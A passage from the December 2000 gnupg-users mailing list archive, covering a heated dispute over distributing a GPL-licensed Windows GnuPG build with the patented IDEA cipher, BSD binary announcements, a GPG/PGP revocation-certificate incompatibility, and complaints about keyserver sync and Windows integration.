access modules like the IDEA module, why is the version with it statically compiled even needed? Once Werner releases 1.05 it's a done deal. Users will be able to use IDEA seamlessly without even a HINT of violating the GPL. So for that guy (whose name escapes me at the moment) to even keep his version around seems a little suspect. And on another note, I would like to thank Werner for all of his tireless (and usually thankless) programming efforts and wish him and everyone else here Happy Holidays! Rich... ________________________________________ The Central New York Linux User Group Now with one of them web page thingies! www.cnylug.org <-> rich@xxxcnylug.org -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From evangelo@pigdog.org Sun Dec 24 19:06:39 2000 From: evangelo@pigdog.org (ESP) Date: 24 Dec 2000 11:06:39 -0800 Subject: GnuPG 1.0.4-1 + IDEA for Windows In-Reply-To: Keith Ray's message of "Sun, 24 Dec 2000 01:18:04 -0600 (CST)" References: <976900291.3a3a50c3ac947@nullify.org> <20001218140534.E12265@gnupg.de> <977602001.3a4505d13e702@nullify.org> <87zohm7bbl.fsf@roy.bad-people-of-the-future.san-francisco.ca.us> <977642284.3a45a32c931d3@nullify.org> Message-ID: <87ae9l7i68.fsf@roy.bad-people-of-the-future.san-francisco.ca.us> >>>>> "KR" == Keith Ray writes: KR> I guess that's why no one has EVER asked for an IDEA capable KR> Windows version? I guess there are no Windows users who might KR> want to communicate with PGP 2.6x users or use most remailers? Well, we can't always get what we want, can we? This isn't a matter of design or functionality, it's a matter of the law. Why isn't that getting through to you? KR> I am not trying to prove a point. I merely wish to allow KR> those who want a GnuPG+IDEA binary to be able to have one. I KR> give it away free and provide source. Isn't that the point of KR> Free Software? If commercial users don't want it, they can KR> download the official release. But for all noncommercial KR> users, there is NO reason why they shouldn't be able to have KR> IDEA support. Yeah, except it's patented, and you're therefore breaking the GPL. KR> The no patents clause of the GPL is stupid! Whatever! Don't use the software if you don't agree to the license. And especially don't redistribute it! If you really strongly disagree with the GPL on this matter, why don't you build your own damn encryption system, put whatever patented crap you want in it, and distribute it? KR> Why can't we provide TWO versions and let the users decide KR> which best meets there needs? Well, at the very least, you're requiring some expensive lawyer time to get you to do something that you know you're going to have to do eventually. What good does that do? KR> The unix users have had this choice for some time, why are the KR> Window's users less deserving? I am not taking anything away KR> from Werner or anyone else. You know, that's not for us to decide. It's the patent holder that's decided it, and there is a work-around already. http://www.gnupg.org/gph/en/pgp2x.html The workaround is there because of the patents. KR> So it's real simple. Either leave me alone and let the users KR> decide which version they want, or force me to stop. I am not KR> trying to steal anyone's work or make money off it. No, you're just being confrontational and obnoxious with someone who's given you a gift. That's got to be the most dickheaded thing in the world. Werner and tons of other people worked REAL HARD to make GnuPG for you. They've done a lot to give you absolutely free encryption. And they even did everything they could within the bounds of the law to make it work with PGP. They've thought it through more than you. They gave you the software for FREE, under some very easy terms (the GPL). You are breaking those terms and acting like you're being put upon. Creep. KR> I am merely adding some much requested functionality. ...which is not in there for a very good reason. God, you're an ass. ~ESP -- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ESP | http://pigdog.org/ "Fan belts break at 3AM. I get mad, drinks get spilled." ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From rich@cnylug.org Sun Dec 24 19:18:27 2000 From: rich@cnylug.org (Rich) Date: Sun, 24 Dec 2000 14:18:27 -0500 Subject: GnuPG 1.0.4-1 + IDEA for Windows In-Reply-To: <3kwbnD.A.4eB.UlkR6@mail.hsp.de> References: <977642284.3a45a32c931d3@nullify.org> <3kwbnD.A.4eB.UlkR6@mail.hsp.de> Message-ID: <3A464C03C8.518ARICH@mail.dreamscape.com> Hello all, and happy holidays. While I agree that this person should not be distributing a GnuPG version that is in violation of the GPL, While I'm not certain that this is necessarily the best forum for argue the point, I am certain that this isn't the time of year to do it! :-) If Werner isn't constantly being asked for a GnuPG library he's having to see this kind of thing in his forums. :-) I think the best solution to this problem is to let that guy (whose name once again escapes me) do his thing, and let Werner do his thing and let the chips fall where they may. We really don't have the power to make that guy STOP compiling his version of GnuPG with IDEA compiled in, so why argue about it? If in the future the IDEA patent holders wish to go after him or the FSF, they will. There are plenty of witnesses that will testify that the official version does not contain IDEA so I think Werner is safe from a legal perspective. I hope everyone gets that Quad CPU box with 1-gig of RAM that they've been wanting! :-) Happy Holidays! Rich... ________________________________________ The Central New York Linux User Group Now with one of them web page thingies! www.cnylug.org <-> rich@XXXcnylug.org -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From mhw@wittsend.com Sun Dec 24 22:16:21 2000 From: mhw@wittsend.com (Michael H. Warfield) Date: Sun, 24 Dec 2000 17:16:21 -0500 Subject: GnuPG 1.0.4-1 + IDEA for Windows In-Reply-To: <87ae9l7i68.fsf@roy.bad-people-of-the-future.san-francisco.ca.us>; from evangelo@pigdog.org on Sun, Dec 24, 2000 at 11:06:39AM -0800 References: <976900291.3a3a50c3ac947@nullify.org> <20001218140534.E12265@gnupg.de> <977602001.3a4505d13e702@nullify.org> <87zohm7bbl.fsf@roy.bad-people-of-the-future.san-francisco.ca.us> <977642284.3a45a32c931d3@nullify.org> <87ae9l7i68.fsf@roy.bad-people-of-the-future.san-francisco.ca.us> Message-ID: <20001224171621.C4668@alcove.wittsend.com> On Sun, Dec 24, 2000 at 11:06:39AM -0800, ESP wrote: > Yeah, except it's patented, and you're therefore breaking the GPL. Yes, and you are still ignoring the issue of "what jurisdiction?" This is perfectly and completely legal in the EC. So he can get it hosted in the EC and not violate the GPL? If that is violating the GPL, what's stopping some banana republic from claiming XOR is patented (it was, by Xerox)? > KR> The no patents clause of the GPL is stupid! > Whatever! Don't use the software if you don't agree to the > license. And especially don't redistribute it! The patents clause of the GPL is invalid simply because it doesn't address the issue of jurisdiction. With that clause in place, we either have software which is GPL in some countries and not in either, or we say that any patent anywhere applies which places the GPL hostage to any past, present or future patent scheme in any country in the world, or we say that one countrie's jurisdiction applies to the entire world. (The US applying to EC, yeah right... They'll be singing Jingle Bells in hades.) I agree with other posters. This is NOT an issue for this list. This is an issue for Ascom and FSF (and far FAR more for Ascom than FSF). If they do not wish to take action, we have no place in bitching. If they wish to permit it for those people who take them up on their offer of noncommercial licenses, that's fine too. Not for us to say. > If you really strongly disagree with the GPL on this matter, why don't > you build your own damn encryption system, put whatever patented crap > you want in it, and distribute it? He has meet the letter of the GPL as applied in the EC. If it doesn't apply in the US, fine. Distribute it from one of the .nl crypto sites. Replay changed names and is now what, zedz.net? Upload it to zedz.net and be done with it! What are you going to do then? It meets the full letter of the GPL. Idea is NOT patented in that jurisdiction. > KR> Why can't we provide TWO versions and let the users decide > KR> which best meets there needs? > Well, at the very least, you're requiring some expensive lawyer time > to get you to do something that you know you're going to have to do > eventually. What good does that do? > KR> The unix users have had this choice for some time, why are the > KR> Window's users less deserving? I am not taking anything away > KR> from Werner or anyone else. > You know, that's not for us to decide. It's the patent holder that's > decided it, and there is a work-around already. > http://www.gnupg.org/gph/en/pgp2x.html You're right! It is up to the patent holder, which does not exist in Europe, since the patent doesn't exist in Europe. > The workaround is there because of the patents. > KR> So it's real simple. Either leave me alone and let the users > KR> decide which version they want, or force me to stop. I am not > KR> trying to steal anyone's work or make money off it. > No, you're just being confrontational and obnoxious with someone who's > given you a gift. That's got to be the most dickheaded thing in the > world. You are both being obnoxious. Correct me if I'm wrong, but didn't you call him a dick head? And your are calling HIM obnoxious? Sounds like you both need some growing up to do. > Werner and tons of other people worked REAL HARD to make GnuPG for > you. They've done a lot to give you absolutely free encryption. And > they even did everything they could within the bounds of the law to > make it work with PGP. They've thought it through more than you. > They gave you the software for FREE, under some very easy terms (the > GPL). You are breaking those terms and acting like you're being put > upon. Creep. DISTRIBUTE THE DAMN THING FROM EUROPE! There is no patent on Idea in Europe. There are plenty of sites in Europe from which to distribute it. It is perfectly legal and, until the GPL codifies US patent law in all things GPL, conforms to the GPL in that jurisdiction. What the rest of us do with it is up to us. > KR> I am merely adding some much requested functionality. > ...which is not in there for a very good reason. God, you're an ass. YOU BOTH ARE! You just got done telling him that he's offensive. Why don't you read your own postings as if you were the other person. Right now, I'm not sure which of the two of you is more offensive!!!! > ~ESP My 0.02 euro. > -- > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ > ESP | http://pigdog.org/ > "Fan belts break at 3AM. I get mad, drinks get spilled." > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mike -- Michael H. Warfield | (770) 985-6132 | mhw@WittsEnd.com (The Mad Wizard) | (678) 463-0932 | http://www.wittsend.com/mhw/ NIC whois: MHW9 | An optimist believes we live in the best of all PGP Key: 0xDF1DD471 | possible worlds. A pessimist is sure of it! -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From mhw@wittsend.com Mon Dec 25 06:30:36 2000 From: mhw@wittsend.com (Michael H. Warfield) Date: Mon, 25 Dec 2000 01:30:36 -0500 Subject: GnuPG 1.0.4-1 + IDEA for Windows In-Reply-To: <20001224171621.C4668@alcove.wittsend.com>; from mhw@wittsend.com on Sun, Dec 24, 2000 at 05:16:21PM -0500 References: <976900291.3a3a50c3ac947@nullify.org> <20001218140534.E12265@gnupg.de> <977602001.3a4505d13e702@nullify.org> <87zohm7bbl.fsf@roy.bad-people-of-the-future.san-francisco.ca.us> <977642284.3a45a32c931d3@nullify.org> <87ae9l7i68.fsf@roy.bad-people-of-the-future.san-francisco.ca.us> <20001224171621.C4668@alcove.wittsend.com> Message-ID: <20001225013036.A2009@alcove.wittsend.com> Followup, after I reread the GPL yet AGAIN... On Sun, Dec 24, 2000 at 05:16:21PM -0500, Michael H. Warfield wrote: > The patents clause of the GPL is invalid simply because it doesn't > address the issue of jurisdiction. With that clause in place, we either > have software which is GPL in some countries and not in either, or we > say that any patent anywhere applies which places the GPL hostage to > any past, present or future patent scheme in any country in the world, > or we say that one countrie's jurisdiction applies to the entire world. > (The US applying to EC, yeah right... They'll be singing Jingle Bells > in hades.) Ok... I blew it. The GPL has specific provisions for distribution in the case of patents enforced in certain geographical areas. ] 8. If the distribution and/or use of the Program is restricted in ] certain countries either by patents or by copyrighted interfaces, the ] original copyright holder who places the Program under this License ] may add an explicit geographical distribution limitation excluding ] those countries, so that distribution is permitted only in or among ] countries not thus excluded. In such case, this License incorporates ] the limitation as if written in the body of this License. Ok... That sounds like a way out of the box, doesn't it. Add a message stating the geographical distribution. Of course, the section says "may add". That's interesting in that we now have a dilema. If the GPL prohibits any and all patented technology, then this passage is simply gibberish. You could never HAVE any such qualifying software, if the very thing itself was prohibited. If it is NOT truely prohibited, as section 8 implies, then the original copyright holder is only obligated under a "may" and not even a "should" much less a "must". To use IETF delineations of nominclature, "must" implies something that is required, while "should" is something recommended and "may" is something permitted. So section 8 of the GPL as it is included with GnuPG states that if a program (implied to be under the GPL or why would we be discussing this) is restricted by patents (implying that GPL software might be restricted by patents) then the author is permitted (may) to add a restriction on distribution. It would appear that sections 7 and 8 are in direct conflict with each other. How can you even have section 8 if an allegation of patent infringement means that you must refrain entirely from distribution. Looks like we have an RMS paradox here. It's pretty clear that if patents were excluded from GPL software, section 8 would be superfluous. If section 8 is NOT superfluous, then patents are permitted in GPL software (even patents without universally free access as described elsewhere) and if the authors of the GPL had meant to REQUIRE an author to restrict distribution, they would have used other verbage in section 8. Section 8 exists and is worded "may". BTW... We now have a problem. Since it has been insisted that this can not be distributed because it contains the Idea algorithm and that algorithm is patented, there is something else in GnuPG which is patented. Hyperlinks. Yes folks, in case you have been living under a rock recently, British Telecom not only claims to hold a patent on Hyperlinking technology in general but they are also suing Prodigy for infringing on that patent in the US. With any decent luck (and a clueful judge) this will be thrown out for the rediculous non-sense that it is. ITMT, however, GnuPG contains hyperlinks in its README files and in the various html files and even in a few .c sources. Till it is thrown out in court, we could be held to be infringing. Even the extreme rediculous examples that people dream up can't hold a candle to reality. :-( Under section 7, we now have an allegation of infringement of the BT Hyperlink patent. Now we have a problem, even if all of us AGREE that the patent is rediculous, since the GPL says explicitly, "or allegation of patent infringement." You don't even have to be proven to be infringing and it says nothing about the legitimacy or sanity of the patent itself. It just says "or allegation". Under RMS writing, we are guilty until proven innocent. That's exactly what RMS is point out in this section of the GPL: ] Finally, any free program is threatened constantly by software ] patents. We wish to avoid the danger that redistributors of a free ] program will individually obtain patent licenses, in effect making the ] program proprietary. To prevent this, we have made it clear that any ] patent must be licensed for everyone's free use or not licensed at all. Well... According to BT, hyperlinking is not free to use without royalties (and they are hitting up several other ISP's for royalities as well). They constitute some small subset of "everyone". > > you want in it, and distribute it? > He has meet the letter of the GPL as applied in the EC. If it > doesn't apply in the US, fine. Distribute it from one of the .nl crypto > sites. Replay changed names and is now what, zedz.net? Upload it to > zedz.net and be done with it! What are you going to do then? It meets > the full letter of the GPL. Idea is NOT patented in that jurisdiction. Declare the distribution per the GPL and distribute it with that statement. Question becomes, what consitutes an explicit geographical distribution limitation? Obviously, a list of countries would qualify. Would a statement that "can be distributed with no limitations in any country where Idea is not patented" constitute an explicit geographical limitation? In most cases, it would. It states a testable definitive condition underwhich an explicit determination can be made. Works for me. > > KR> Why can't we provide TWO versions and let the users decide > > KR> which best meets there needs? > > Well, at the very least, you're requiring some expensive lawyer time > > to get you to do something that you know you're going to have to do > > eventually. What good does that do? Nope... Take the easy way out of the box. State the distribution and let the users sort it out, just like they did with the original pgp and the US export restrictions. Free for distribution in Europe and other countries not encumbered by software patents. Right there in the GPL. My 0.02 euro. [...] Mike -- Michael H. Warfield | (770) 985-6132 | mhw@WittsEnd.com (The Mad Wizard) | (678) 463-0932 | http://www.wittsend.com/mhw/ NIC whois: MHW9 | An optimist believes we live in the best of all PGP Key: 0xDF1DD471 | possible worlds. A pessimist is sure of it! -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From fw@deneb.enyo.de Mon Dec 25 16:15:41 2000 From: fw@deneb.enyo.de (Florian Weimer) Date: 25 Dec 2000 17:15:41 +0100 Subject: GnuPG 1.0.4-1 + IDEA for Windows In-Reply-To: <20001224171621.C4668@alcove.wittsend.com> References: <976900291.3a3a50c3ac947@nullify.org> <20001218140534.E12265@gnupg.de> <977602001.3a4505d13e702@nullify.org> <87zohm7bbl.fsf@roy.bad-people-of-the-future.san-francisco.ca.us> <977642284.3a45a32c931d3@nullify.org> <87ae9l7i68.fsf@roy.bad-people-of-the-future.san-francisco.ca.us> <20001224171621.C4668@alcove.wittsend.com> Message-ID: <87y9x4xys2.fsf@deneb.enyo.de> "Michael H. Warfield" writes: > DISTRIBUTE THE DAMN THING FROM EUROPE! > > There is no patent on Idea in Europe. Wrong, there is a patent, see: http://l2.espacenet.com/dips/viewer?PN=EP0482154&CY=de&LG=de&DB=EPD -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From mhw@wittsend.com Tue Dec 26 00:33:21 2000 From: mhw@wittsend.com (Michael H. Warfield) Date: Mon, 25 Dec 2000 19:33:21 -0500 Subject: GnuPG 1.0.4-1 + IDEA for Windows In-Reply-To: <87y9x4xys2.fsf@deneb.enyo.de>; from fw@deneb.enyo.de on Mon, Dec 25, 2000 at 05:15:41PM +0100 References: <976900291.3a3a50c3ac947@nullify.org> <20001218140534.E12265@gnupg.de> <977602001.3a4505d13e702@nullify.org> <87zohm7bbl.fsf@roy.bad-people-of-the-future.san-francisco.ca.us> <977642284.3a45a32c931d3@nullify.org> <87ae9l7i68.fsf@roy.bad-people-of-the-future.san-francisco.ca.us> <20001224171621.C4668@alcove.wittsend.com> <87y9x4xys2.fsf@deneb.enyo.de> Message-ID: <20001225193321.A2011@alcove.wittsend.com> On Mon, Dec 25, 2000 at 05:15:41PM +0100, Florian Weimer wrote: > "Michael H. Warfield" writes: > > DISTRIBUTE THE DAMN THING FROM EUROPE! > > There is no patent on Idea in Europe. > Wrong, there is a patent, see: > http://l2.espacenet.com/dips/viewer?PN=EP0482154&CY=de&LG=de&DB=EPD Refinement... There are is no patent on Idea in those European countries which have no software patents. Germany is an oddball one where software can be patented if it is reduced to hardware (if I remember the stipulation correctly). Switzerland, obviously, allows software patents. Most other European countries do not. You are correct that the statement "There is no patent on Idea in Europe" is overly general and literally false. The correct statement would have been "There is no patent on Idea in the majority of European countries". I stand corrected. You can still distribute it from Zedz.net along with the other versions of pgp which include and incorporate Idea. It does not violate any patent or the GPL there. Mike -- Michael H. Warfield | (770) 985-6132 | mhw@WittsEnd.com (The Mad Wizard) | (678) 463-0932 | http://www.wittsend.com/mhw/ NIC whois: MHW9 | An optimist believes we live in the best of all PGP Key: 0xDF1DD471 | possible worlds. A pessimist is sure of it! -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From johanw@vulcan.xs4all.nl Tue Dec 26 11:17:22 2000 From: johanw@vulcan.xs4all.nl (Johan Wevers) Date: Tue, 26 Dec 2000 12:17:22 +0100 (MET) Subject: GnuPG 1.0.4-1 + IDEA for Windows and more In-Reply-To: <3A461BFD230.3414RICH@mail.dreamscape.com> from Rich at "Dec 24, 2000 10:53:33 am" Message-ID: <200012261117.MAA06640@vulcan.xs4all.nl> Rich wrote: > Well, now that Werner has added the code that allows the Win32 > version to access modules like the IDEA module, why is the version > with it statically compiled even needed? It won't be, after 1.05 is released (assuming 1.05 contains this code). > Once Werner releases 1.05 it's a done deal. Did anyone claim otherwise? > And on another note, I would like to thank Werner for all of his > tireless (and usually thankless) programming efforts and wish him and > everyone else here Happy Holidays! On this point I agree. -- ir. J.C.A. Wevers // Physics and science fiction site: johanw@vulcan.xs4all.nl // http://www.xs4all.nl/~johanw/index.html PGP/GPG public keys at http://www.xs4all.nl/~johanw/pgpkeys.html -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From rmartini@iis.com.br Tue Dec 26 23:00:39 2000 From: rmartini@iis.com.br (rmartini@iis.com.br) Date: Tue, 26 Dec 2000 20:00:39 -0300 Subject: Release: GnuPG 1.0.4 for BSD 3.1 Message-ID: <200012262200.eBQM0dC00301@mail.iis.com.br> GnuPG 1.0.4 binaries for BSDI BSD/OS 3.1 ............................................................. *This package was compiled by Gregory Karpinsky (gregory@tiv.net) TIV.NET Inc. (http://tiv.net) *This package is available at "GnuPG for Unix" web site (http://gnupg.unixsecurity.com.br). Email: rmartini@cipsga.org.br Thanks Renato Martini -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From rmartini@iis.com.br Wed Dec 27 02:16:38 2000 From: rmartini@iis.com.br (rmartini@iis.com.br) Date: Tue, 26 Dec 2000 23:16:38 -0300 Subject: GnuPG for BSD 4.1 Message-ID: <200012270116.eBR1GcC24365@mail.iis.com.br> GnuPG 1.0.4 binaries for BSDI BSD/OS 4.1 ............................................................. *This package was compiled by Gregory Karpinsky (gregory@tiv.net) TIV.NET Inc. (http://tiv.net) *This package is available at "GnuPG for Unix" web site (http://gnupg.unixsecurity.com.br). Email: rmartini@cipsga.org.br Thanks Renato Martini -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From kai.raven@gmx.de Wed Dec 27 10:15:59 2000 From: kai.raven@gmx.de (Kai Raven) Date: Wed, 27 Dec 2000 11:15:59 +0100 Subject: GPG revocations & PGP Message-ID: <200012271115590773.00447890@mail.gmx.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: RIPEMD160 Hi, i have some difficulties with GPG revocations. I have created a revocation for a test key with "gpg -o file - --gen-revoke key-id" but it is not possible to import this revocation with PGP 6.5.8. PGP warns me, that "The keyring file is corrupt". And the keyserver (pgp5.ai.mit.edu) tells me: "Key block in add request contained no new keys, userid's, or signatures. Your key block contained 1 format errors, which were treated as if the erroneous elements hadn't been part of your submission. The last error was on key 0x00000000: Key block corrupt: signature without key" So i have to export the GPG key, re-import it with PGP to create a revocation, which is accepted by PGP and keyservers? Wouldn't it be better to have a revocation scheme, which is compliant to PGP and all the PGP keyservers? Or do i a mistake? ;-) Ciao Kai -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4-1 (MingW32) - GnuPGshell v1.00 Comment: GnuPG for authentication and privacy in the nets iQEVAwUBOknA3bvhIjV7JRZxAQN2Gwf/WvWKEO+UaHVBtbm1VXjP1YOYNVHIfE9C m+8ILTXxoLx8F++t1gCKLQngUiRPYHHd9+Fpj2fUNeTfSf130E0B0x8dh3rXCNSE YbiY/rP4AaEACTCT/NmfAOGfydPttzF3teilbSHDDMXcyhe1R1h4sHe+r3VeNnBH gsczIqrrC0wbY6GuJjEk54wAFCKexoJNH8yWsW6EvB/8ZktBZI72VzYrDb07qqRl IFD7FioNeT36iE6uHMNDf3ay3TZ1R4+7AvVzAGsFQr4Ja/v6eXifUVfqmq6ADkbN FudoKh4OXX6Lo0J+U6HDkDasSrkFk17NfZFr+G6ITDuLBpYQiwm+xA== =wJW0 -----END PGP SIGNATURE----- -- PGP/GPG [RSA]: 2048-bit Key-ID: 0x7B251671 Homepage: http://beam.to/raven GPG&GnuPGshellinfos: http://home.nexgo.de/kraven/pgp/pgp02aa.html -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From fw@deneb.enyo.de Wed Dec 27 12:03:22 2000 From: fw@deneb.enyo.de (Florian Weimer) Date: 27 Dec 2000 13:03:22 +0100 Subject: GPG revocations & PGP In-Reply-To: <200012271115590773.00447890@mail.gmx.net> References: <200012271115590773.00447890@mail.gmx.net> Message-ID: <87puienkad.fsf@deneb.enyo.de> "Kai Raven" writes: > I have created a revocation for a test key with "gpg -o file > - --gen-revoke key-id" but it is not possible to import this revocation > with PGP 6.5.8. > PGP warns me, that "The keyring file is corrupt". With --gen-revoke, you have created a bare revocation self-signature. I think PGP requires that the revocation signature is part of an OpenPGP public key (see section 11.1 in RFC 2440). I am not sure if this is a bug in PGP, GnuPG, or the OpenPGP specification. -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From support@oeko.net Wed Dec 27 12:49:23 2000 From: support@oeko.net (Toni Mueller) Date: Wed, 27 Dec 2000 13:49:23 +0100 Subject: GnuPG, Winblows, Speed, Key Management Message-ID: <20001227124923.25799.qmail@oak.oeko.net> Hello, I'm currently promoting the use of GnuPG, but have a number of problems doing so. My main reasons to promote GnuPG are that it's both an open-sourced and also non-US encryption package, that it builds on the PGP principles of working w/o a central CA, and because it's able to incorporate newer encryption algorithms and longer key lengths than Sphinx (read "political decision"). - Problem #1: There appears to be no good Winblows interface for it, or at least no good way to hook it into Outlook, IE, Netscape there, what have you. - Problem #2: It's dog slow. I have still less than 300 keys in my keyring (expecting to double that soon), and often find myself interrupting gpg to read the message instead of waiting to verify the signature. Similar things hold for signing or encrypting a message. - Problem #3: I have adjusted gpg to fetch keys on demand from a keyserver. My experience is that these key servers apparently don't synchronize their data sets in a reasonable time frame (weeks!), so I end up fetching keys from varying servers. This is __very__ inconvenient, and of course unsuitable to the casual Winblows user. How do I go about this? - Problem #4: What to do in the face of massive distribution and promotion of Sphinx which is also _not_ interoperable with any kind of PGP? Please Cc me on answers since I'm not on the list. Thank you! Best Regards, --Toni++ -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From minton@csc.smsu.edu Wed Dec 27 16:49:42 2000 From: minton@csc.smsu.edu (Brian Minton) Date: Wed, 27 Dec 2000 10:49:42 -0600 Subject: GnuPG, Winblows, Speed, Key Management In-Reply-To: <20001227124923.25799.qmail@oak.oeko.net>; from support@oeko.net on Wed, Dec 27, 2000 at 01:49:23PM +0100 References: <20001227124923.25799.qmail@oak.oeko.net> Message-ID: <20001227104940.B591@aspirin.smsu.edu> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On Wed, Dec 27, 2000 at 01:49:23PM +0100, Toni Mueller wrote: > - Problem #1: There appears to be no good Winblows interface for it, > or at least no good way to hook it into Outlook, IE, Netscape there, > what have you. I think that is being worked on. for instance, there was some discussion about WinPT (I think that is right) > - Problem #2: It's dog slow. I have still less than 300 keys in my > keyring (expecting to double that soon), and often find myself > interrupting gpg to read the message instead of waiting to verify > the signature. Similar things hold for signing or encrypting a > message. I have more experience with pgp for linux, so this is not completely relevant, but the pgp I have is much slower than gpg. like it will take about 75 seconds to extract a key, all the while running at full cpu usage... > - Problem #3: I have adjusted gpg to fetch keys on demand from a > keyserver. My experience is that these key servers apparently > don't synchronize their data sets in a reasonable time frame > (weeks!), so I end up fetching keys from varying servers. This > is __very__ inconvenient, and of course unsuitable to the casual > Winblows user. How do I go about this? I have encountered this problem too, but it is the same with pgp for windows, as far as I have seen. Theoretically, the keyservers should be more in sync with each other, but in my experience, certserver.pgp.com is the most troublesome. most of the other ones (pgp.mit.edu, wwwkeys.eu.pgp.net, etc.) seem to be better about it. > - Problem #4: What to do in the face of massive distribution and > promotion of Sphinx which is also _not_ interoperable with any > kind of PGP? pardon my ignorance, but I've never heard of Sphinx, what is it? - -- Brian Minton minton@csc.smsu.edu Caution: in case of rapture, this computer will be unoccupied! PGP 0xE177AFF0 fingerprint AB94 E395 78CE 0967 2542 A7B3 178C 3E66 E177 AFF0 -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE6Sh2ep0PPDCS0QgIRAjaTAJwJhkgIKJmfFTfk0FPQ860GBmfSbACeOdeJ 4ujwEtIjNiyqKJBMuvQs3AU= =+56O -----END PGP SIGNATURE----- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From support@oeko.net Wed Dec 27 17:30:05 2000 From: support@oeko.net (Toni Mueller) Date: Wed, 27 Dec 2000 18:30:05 +0100 Subject: GnuPG, Winblows, Speed, Key Management In-Reply-To: <20001227104940.B591@aspirin.smsu.edu>; from minton@csc.smsu.edu on Wed, Dec 27, 2000 at 10:49:42AM -0600 References: <20001227124923.25799.qmail@oak.oeko.net> <20001227104940.B591@aspirin.smsu.edu> Message-ID: <20001227173005.937.qmail@oak.oeko.net> Hello Brian, thanks for the answer. On Wed, Dec 27, 2000 at 10:49:42AM -0600, Brian Minton wrote: > On Wed, Dec 27, 2000 at 01:49:23PM +0100, Toni Mueller wrote: > > - Problem #1: There appears to be no good Winblows interface for it, > I think that is being worked on. for instance, there was some discussion > about WinPT (I think that is right) I'm just testing out WinPT, but this is no real substitute for a program that just places a new encryption button in the button bar of your favourite program, eg. next to "print message", so users have a minimal learning curve. > > - Problem #2: It's dog slow. I have still less than 300 keys in my > I have more experience with pgp for linux, so this is not completely relevant, I should have been clearer, but I have almost no experience using Winblows, but run almost exclusively on Linux and BSD for myself. I'm talking about my Linux experience here, and about problems I see when advising customers on how to go about encryption. > but the pgp I have is much slower than gpg. like it will take about 75 > seconds to extract a key, all the while running at full cpu usage... A friend of mine has to wait only a few seconds under Linux and with PGP and with some 2k keys, but several minutes using gpg on the same machine and only a few hundred keys. I have only 250-300 keys yet, but - as said - expect that to double (triple?) very soon. > > - Problem #3: I have adjusted gpg to fetch keys on demand from a > > keyserver. My experience is that these key servers apparently ... using wwwkeys.eu.pgp.net which unfortunately has only a few of the Debian keyring or other US-centric keys. > I have encountered this problem too, but it is the same with pgp for windows, Sorry here ... I mixed it up again. The problem for me is only general GPG/PGP usability here. I can expect the average Winblows user to type in a passphrase _once_ a day, but can't expect them to diagnose that a key server is hanging (and not their Exchange), and how to adjust to another key server, or how to skip en/decryption. > as far as I have seen. Theoretically, the keyservers should be more in sync > with each other, but in my experience, certserver.pgp.com is the most I expected this, but in fact have seen keys not distributed across them for some 2 months (which I almost equal to being non-functional). > > - Problem #4: What to do in the face of massive distribution and > > promotion of Sphinx which is also _not_ interoperable with any > > kind of PGP? > > pardon my ignorance, but I've never heard of Sphinx, what is it? http://www.bsi.de/aufgaben/projekte/sphinx/index.htm Especially if you grok German there should be a good deal of material, but there is also some English stuff (also advertised on their homepage www.bsi.de). I'm still not on the list, please Cc me for answers. Thank you! Best Regards, --Toni++ -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From graham@todd276.worldonline.co.uk Wed Dec 27 17:35:15 2000 From: graham@todd276.worldonline.co.uk (Graham) Date: Wed, 27 Dec 2000 17:35:15 GMT Subject: GnuPG, Winblows, Speed, Key Management In-Reply-To: <20001227124923.25799.qmail@oak.oeko.net> References: <20001227124923.25799.qmail@oak.oeko.net> Message-ID: <20001227171432.37A4.GRAHAM@todd276.worldonline.co.uk> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hi there, Toni Mueller, On 27 December 2000, I received the following message from you regarding "GnuPG, Winblows, Speed, Key Management" TM> Hello, TM> TM> I'm currently promoting the use of GnuPG, but have a number of TM> problems doing so. My main reasons to promote GnuPG are that TM> it's both an open-sourced and also non-US encryption package, TM> that it builds on the PGP principles of working w/o a central TM> CA, and because it's able to incorporate newer encryption TM> algorithms and longer key lengths than Sphinx TM> (read "political decision"). TM> TM> - Problem #1: There appears to be no good Winblows interface for it, TM> or at least no good way to 